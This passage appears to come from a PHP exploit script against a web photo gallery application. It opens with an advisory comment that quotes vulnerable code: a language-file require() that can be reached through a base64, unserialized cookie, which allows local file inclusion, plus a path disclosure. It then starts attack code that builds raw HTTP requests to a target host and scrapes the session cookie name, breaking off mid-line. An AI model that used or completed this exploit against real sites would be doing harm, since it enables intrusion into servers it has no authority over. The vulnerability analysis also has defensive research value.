authenticate(); [...] 301. // Process language selection if present in URI or in user profile or try 302. // autodetection if default charset is utf-8 303. if (!empty($_GET['lang'])) 304. { 305. $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang']; 306. } 307. 308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php')) 309. { 310. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language 311. $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________'); 312. } 313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2] 314. { 315. include('include/select_lang.inc.php'); 316. if (file_exists('lang/' . $USER['lang'] . '.php')) 317. { 318. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language 319. $CONFIG['lang'] = $USER['lang']; 320. } 321. } 322. else 323. { 324. unset($USER['lang']); 325. } 326. 327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang'])) 328. { 329. unset($CONFIG['default_lang']); 330. } 331. 332. if (!file_exists("lang/{$CONFIG['lang']}.php")) 333. $CONFIG['lang'] = 'english'; 334. 335. // We load the chosen language file 336. require "lang/{$CONFIG['lang']}.php"; <======== [3] if $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could be able to include an arbitrary local file through the require() at line 336 [3], due to $USER array can be manipulate by cookies (see user_get_profile() function [1] defined into /include/functions.inc.php, near lines 128-146) [-] Path disclosure in /themes/sample/theme.php [-] Possible bug fix in /include/functions.inc.php 128. function user_get_profile() 129. { 130. global $CONFIG, $USER; 131. 132. if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) { 133. $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data'])); 134. $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang']; 135. } */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function get_info() { global $host, $path, $cookie, $version, $path_disc; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); preg_match("/Set-Cookie: (.*)_data/", $html, $match); $cookie = $match[1]; preg_match("/